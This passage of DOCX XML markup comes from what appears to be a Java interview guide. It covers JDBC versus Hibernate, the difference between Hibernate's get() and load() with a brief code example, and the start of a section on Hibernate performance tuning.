          </w:tcPr>
          <w:p w14:paraId="023E2767"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DB-independent using dialects</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="32342F76" w14:textId="77777777" w:rsidTr="0041674A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6227838D"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Learning Curve</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20EEA120"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imple and straightforward</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DA8077D"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teeper learning curve</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="05FFCB57" w14:textId="77777777" w:rsidTr="0041674A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="170D8ED2"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ode Length</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E2CD6AB"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Verbose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="193449CC"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ess boilerplate code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="60B376D9" w14:textId="77777777" w:rsidTr="0041674A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41286CDF"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Error Handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46E57D8E"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Manual try-catch, SQLException</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D0E828E"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Built-in exception hierarchy, cleaner handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="15EB06F2" w14:textId="77777777" w:rsidTr="0041674A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FE34702"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Relationships Support</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D281250"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Must be handled manually via joins</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="755340D4"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Automatically handles relationships via annotations/XML</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="365ED320" w14:textId="77777777" w:rsidTr="0041674A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74762430"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Batch Processing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73574111"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Manual</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75681E49" w14:textId="77777777" w:rsidR="0041674A" w:rsidRPr="007F3379" w:rsidRDefault="0041674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implified via built-in methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6ED64F29" w14:textId="77777777" w:rsidR="0041674A"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D4E6BF2">
          <v:rect id="_x0000_i2424" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA7BE3F" w14:textId="77777777" w:rsidR="0041674A" w:rsidRPr="007F3379" w:rsidRDefault="0041674A"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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743A5585" w14:textId="77777777" w:rsidR="0041674A" w:rsidRPr="007F3379" w:rsidRDefault="0041674A" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1980"/>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JDBC</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is suitable for small/simple applications where full control over SQL is needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEFB8F6" w14:textId="77777777" w:rsidR="0041674A" w:rsidRPr="007F3379" w:rsidRDefault="0041674A" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1980"/>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Hibernate</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is ideal for complex, enterprise applications requiring object mapping, caching, and database independence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD498F6" w14:textId="19350086" w:rsidR="00C97E60" w:rsidRPr="00CE4B95"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D7A55A9">
          <v:rect id="_x0000_i2425" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DB0CA4" w14:textId="5348B010" w:rsidR="0058719D" w:rsidRPr="00CE4B95" w:rsidRDefault="0058719D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="548" w:name="_Toc196308028"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What is the difference between get</w:t>
      </w:r>
      <w:r w:rsidR="00F90DFB" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and load</w:t>
      </w:r>
      <w:r w:rsidR="00F90DFB" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> method in hibernate?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="548"/>
    </w:p>
    <w:p w14:paraId="456E36E6" w14:textId="4F048A8F" w:rsidR="00F90DFB" w:rsidRPr="007F3379" w:rsidRDefault="00F90DFB" w:rsidP="007F3379">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Difference Between get() and load() in Hibernat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72"/>
        <w:gridCol w:w="3665"/>
        <w:gridCol w:w="4248"/>
      </w:tblGrid>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="370446D9" w14:textId="77777777" w:rsidTr="00F90DFB">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="303CEEB9" w14:textId="77777777" w:rsidR="00F90DFB" w:rsidRPr="007F3379" w:rsidRDefault="00F90DFB"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C9EF62A" w14:textId="77777777" w:rsidR="00F90DFB" w:rsidRPr="007F3379" w:rsidRDefault="00F90DFB"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get()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6956839E" w14:textId="77777777" w:rsidR="00F90DFB" w:rsidRPr="007F3379" w:rsidRDefault="00F90DFB"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load()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="5983837E" w14:textId="77777777" w:rsidTr="00F90DFB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A1ED5BD" w14:textId="77777777" w:rsidR="00F90DFB" w:rsidRPr="007F3379" w:rsidRDefault="00F90DFB"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Fetching Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BFA8482" w14:textId="77777777" w:rsidR="00F90DFB" w:rsidRPr="007F3379" w:rsidRDefault="00F90DFB"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Eager</w:t>
            </w:r>
            <w:r w:rsidRPr="007F3379">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> – hits DB immediately</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64BA48B0" w14:textId="77777777" w:rsidR="00F90DFB" w:rsidRPr="007F3379" w:rsidRDefault="00F90DFB"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Lazy</w:t>
            </w:r>
            <w:r w:rsidRPr="007F3379">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> – returns proxy, DB hit on access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="7C08C735" w14:textId="77777777" w:rsidTr="00F90DFB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="255866C5" w14:textId="77777777" w:rsidR="00F90DFB" w:rsidRPr="007F3379" w:rsidRDefault="00F90DFB"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Return Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B6B5FEB" w14:textId="77777777" w:rsidR="00F90DFB" w:rsidRPr="007F3379" w:rsidRDefault="00F90DFB"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Returns null if entity not found</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="714B97BB" w14:textId="77777777" w:rsidR="00F90DFB" w:rsidRPr="007F3379" w:rsidRDefault="00F90DFB"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hrows ObjectNotFoundException if not found</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="703BB590" w14:textId="77777777" w:rsidTr="00F90DFB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77CF3A35" w14:textId="77777777" w:rsidR="00F90DFB" w:rsidRPr="007F3379" w:rsidRDefault="00F90DFB"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Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63F8EA21" w14:textId="77777777" w:rsidR="00F90DFB" w:rsidRPr="007F3379" w:rsidRDefault="00F90DFB"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hen you are unsure if the object exists</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F3ADCF6" w14:textId="77777777" w:rsidR="00F90DFB" w:rsidRPr="007F3379" w:rsidRDefault="00F90DFB"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hen you are sure the object exists</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="7F036742" w14:textId="77777777" w:rsidTr="00F90DFB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DB13A3E" w14:textId="77777777" w:rsidR="00F90DFB" w:rsidRPr="007F3379" w:rsidRDefault="00F90DFB"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Performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="531429C6" w14:textId="77777777" w:rsidR="00F90DFB" w:rsidRPr="007F3379" w:rsidRDefault="00F90DFB"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lightly slower (immediate DB hit)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4793752F" w14:textId="77777777" w:rsidR="00F90DFB" w:rsidRPr="007F3379" w:rsidRDefault="00F90DFB"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More efficient when object might not be used</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="49AACD87" w14:textId="77777777" w:rsidTr="00F90DFB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="409D515A" w14:textId="77777777" w:rsidR="00F90DFB" w:rsidRPr="007F3379" w:rsidRDefault="00F90DFB"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Proxy Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E46C5A1" w14:textId="77777777" w:rsidR="00F90DFB" w:rsidRPr="007F3379" w:rsidRDefault="00F90DFB"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No proxy, real object returned</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C18ACD2" w14:textId="77777777" w:rsidR="00F90DFB" w:rsidRPr="007F3379" w:rsidRDefault="00F90DFB"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Returns a proxy unless accessed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="354F23B0" w14:textId="77777777" w:rsidTr="00F90DFB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="389B9AB2" w14:textId="77777777" w:rsidR="00F90DFB" w:rsidRPr="007F3379" w:rsidRDefault="00F90DFB"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Behavior on Missing ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="448A72A9" w14:textId="77777777" w:rsidR="00F90DFB" w:rsidRPr="007F3379" w:rsidRDefault="00F90DFB"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Returns null</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E5D88A0" w14:textId="77777777" w:rsidR="00F90DFB" w:rsidRPr="007F3379" w:rsidRDefault="00F90DFB"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hrows exception</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3818EE4E" w14:textId="77777777" w:rsidR="00F90DFB"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96DB066">
          <v:rect id="_x0000_i2426" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7AF83C" w14:textId="77777777" w:rsidR="00F90DFB" w:rsidRPr="007F3379" w:rsidRDefault="00F90DFB"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B91DDBB" w14:textId="77777777" w:rsidR="00F90DFB" w:rsidRPr="007F3379" w:rsidRDefault="00F90DFB"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get()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F410CC" w14:textId="77777777" w:rsidR="00F90DFB" w:rsidRPr="007F3379" w:rsidRDefault="00F90DFB"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mployee emp1 = session.get(Employee.class, 101); // Hits DB immediately</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F352EFC" w14:textId="77777777" w:rsidR="00F90DFB" w:rsidRPr="007F3379" w:rsidRDefault="00F90DFB" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76586152" w14:textId="77777777" w:rsidR="00F90DFB" w:rsidRPr="007F3379" w:rsidRDefault="00F90DFB"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load()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379A7695" w14:textId="77777777" w:rsidR="00F90DFB" w:rsidRPr="007F3379" w:rsidRDefault="00F90DFB"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mployee emp2 = session.load(Employee.class, 102); // Returns proxy; DB hit when accessed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC40C45" w14:textId="77777777" w:rsidR="00F90DFB" w:rsidRPr="007F3379" w:rsidRDefault="00F90DFB"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ystem.out.println(emp2.getName());               // DB hit happens here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B177A3F" w14:textId="77777777" w:rsidR="00F90DFB"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0151FB6">
          <v:rect id="_x0000_i2427" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB9B227" w14:textId="77777777" w:rsidR="00F90DFB" w:rsidRPr="007F3379" w:rsidRDefault="00F90DFB"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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F47855" w14:textId="77777777" w:rsidR="00F90DFB" w:rsidRPr="007F3379" w:rsidRDefault="00F90DFB" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1981"/>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Use get() when you want to fetch the object immediately and safely handle missing records.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B91997" w14:textId="77777777" w:rsidR="00F90DFB" w:rsidRPr="007F3379" w:rsidRDefault="00F90DFB" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1981"/>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Use load() when you're sure the object exists and want lazy loading with better performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268F561B" w14:textId="171B1E72" w:rsidR="00C97E60" w:rsidRPr="00CE4B95"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F6F97B1">
          <v:rect id="_x0000_i2428" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9761A2" w14:textId="3DCB89AC" w:rsidR="00340E7E" w:rsidRPr="00CE4B95" w:rsidRDefault="00340E7E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="549" w:name="_Toc196308029"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Performance tuning and indexing in hibernate?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="549"/>
    </w:p>
    <w:p w14:paraId="6C6B25AE" w14:textId="64C55575" w:rsidR="00EA7E01" w:rsidRPr="007F3379" w:rsidRDefault="00EA7E01" w:rsidP="007F3379">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Performance Tuning and Indexing in Hibernate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65916996" w14:textId="77777777" w:rsidR="00EA7E01"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ED5BF89">
          <v:rect id="_x0000_i2429" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="168C968E" w14:textId="77777777" w:rsidR="00EA7E01" w:rsidRPr="007F3379" w:rsidRDefault="00EA7E01"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1. Performance Tuning Techniques in Hibernat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00"/>
        <w:gridCol w:w="6767"/>
      </w:tblGrid>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="09073158" w14:textId="77777777" w:rsidTr="00EA7E01">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A78911E" w14:textId="77777777" w:rsidR="00EA7E01" w:rsidRPr="007F3379" w:rsidRDefault="00EA7E01"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Area</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E63E2F8" w14:textId="77777777" w:rsidR="00EA7E01" w:rsidRPr="007F3379" w:rsidRDefault="00EA7E01"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="257281B8" w14:textId="77777777" w:rsidTr="00EA7E01">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73FCAA26"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aching</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F1861F3"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Use </w:t>
            </w:r>
            <w:r w:rsidRPr="007F3379">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>L1 (default)</w:t>
            </w:r>
            <w:r w:rsidRPr="007F3379">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:r w:rsidRPr="007F3379">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>L2 cache</w:t>
            </w:r>
            <w:r w:rsidRPr="007F3379">
              <w:rPr>
